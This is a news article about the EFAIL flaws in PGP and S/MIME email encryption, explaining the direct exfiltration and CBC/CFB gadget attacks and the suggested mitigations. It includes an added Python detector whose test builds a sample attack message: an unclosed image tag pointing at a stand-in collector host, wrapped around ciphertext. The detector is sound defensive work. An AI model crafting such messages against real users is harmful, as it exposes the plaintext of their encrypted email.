Critical unpatched vulnerabilities in widely-used email encryption tools PGP and S/MIME have been discovered by a team led by Sebastian Schinzel, professor of Computer Security at the Münster University of Applied Sciences. The vulnerabilities, dubbed EFAIL, were first mentioned by the EFF on Sunday. The EFF’s report only indicated that a vulnerability existed, and that users should disable PGP plugins in their mail clients until patches are deployed.
The researchers intended to hold off on full publication until Tuesday, May 15, but the white paper was published earlier because the embargo was broken.
According to a tweet from Schinzel, the vulnerabilities «might reveal the plaintext of encrypted emails, including encrypted emails sent in the past.» He later added that «There are currently no reliable fixes for the vulnerability.»
S/MIME is relatively commonplace in enterprise email networks, making this vulnerability particularly concerning.
There are two different types of attacks included in EFAIL. The first is a «direct exfiltration» attack that relies on clients such as Apple Mail, iOS Mail, and Mozilla Thunderbird rendering encrypted email as HTML. This attack relies on a three-part message being sent. The first part opens an image tag, the second constitutes the message body, and the third closes the image tag. Because the HTML rendering engine is enabled, the mail client treats the message body as part of a URL, encodes it, and requests that URL from the malicious actor’s server, thereby leaking the message.
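The three-part structure described above can be checked for before a message reaches the mail client. The following is an added example, not code from the researchers or from the original article: it flags an encrypted MIME part that directly follows an HTML part ending inside an unclosed URL attribute. The sample message, the hostnames and all function names are constructed for illustration.

```python
import re
from email import message_from_string

# MIME types of encrypted bodies (S/MIME enveloped data, PGP/MIME control part).
ENCRYPTED_TYPES = {"application/pkcs7-mime", "application/x-pkcs7-mime",
                   "application/pgp-encrypted"}
# A URL-bearing attribute whose opening quote is still open when the part ends.
DANGLING_ATTR = re.compile(
    r"""<\w+[^>]*\b(?:src|href|background)\s*=\s*(["'])(?:(?!\1).)*\Z""",
    re.IGNORECASE | re.DOTALL)

def is_encrypted(part):
    """True for S/MIME or PGP/MIME parts and for ASCII-armored OpenPGP bodies."""
    if part.get_content_type() in ENCRYPTED_TYPES:
        return True
    payload = part.get_payload(decode=True) or b""
    return b"-----BEGIN PGP MESSAGE-----" in payload

def dangling_url_attr(part):
    """True if an HTML part ends in the middle of a quoted URL attribute."""
    if part.get_content_type() != "text/html":
        return False
    html = (part.get_payload(decode=True) or b"").decode("utf-8", "replace")
    return DANGLING_ATTR.search(html.rstrip()) is not None

def flag_direct_exfil(raw):
    """Return indexes (among leaf parts) of encrypted parts that directly
    follow an HTML part which leaves a URL attribute open."""
    leaves = [p for p in message_from_string(raw).walk() if not p.is_multipart()]
    return [i for i in range(1, len(leaves))
            if is_encrypted(leaves[i]) and dangling_url_attr(leaves[i - 1])]

def build_sample(first_html):
    """Constructed message: HTML part, placeholder ciphertext part, HTML part."""
    b = "BOUNDARY"
    return (f'Content-Type: multipart/mixed; boundary="{b}"\n\n'
            f'--{b}\nContent-Type: text/html\n\n{first_html}\n'
            f'--{b}\nContent-Type: application/pkcs7-mime; smime-type=enveloped-data\n'
            f'Content-Transfer-Encoding: base64\n\nQ09OU1RSVUNURUQ=\n'
            f'--{b}\nContent-Type: text/html\n\n">\n--{b}--\n')

if __name__ == "__main__":
    print(flag_direct_exfil(build_sample('<img src="http://collector.example/')))
    print(flag_direct_exfil(build_sample('<img src="http://static.example/logo.png">')))
```

A match is a reason to quarantine the message or strip its HTML parts. The check covers only the direct exfiltration layout, not messages whose ciphertext itself has been modified.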
The second vulnerability partially incorporates the first, and relies on an attacker being able to guess parts of the encrypted communication, which is generally possible due to the nature of the protocol involved. Because a full block of plaintext—the researchers cite S/MIME emails starting with «Content-type: multipart/signed» as one—is known to the attacker, this allows the attacker to «repeatedly [append] CBC gadgets to inject an image tag into the encrypted plaintext. This creates a single encrypted body part that exfiltrates its own plaintext when the user opens the attacker email.»
The researchers note that S/MIME uses Cipher Block Chaining, while OpenPGP uses Cipher Feedback, both of which are exploitable in similar ways. The pair are published as CVE-2017-17688 and CVE-2017-17689.
Although no fix is presently available, the researchers advise, as mitigation steps, that email decryption take place in a separate program and that HTML rendering be disabled in your email client. That said, the researchers indicate that, long term, updates to the OpenPGP and S/MIME standards are necessary to fully address the issue. The developer of NeoPG noted on Twitter that «The OpenPGP working group at the IETF, which was on the way to address some of the issues, was closed in November due to lack of progress.»
The big takeaways for tech leaders:
- The EFAIL vulnerabilities, which currently have no software patch, «might reveal the plaintext of encrypted emails, including encrypted emails sent in the past,» according to researchers.
- The researchers indicate that updates are needed for OpenPGP and S/MIME to fully address the issue.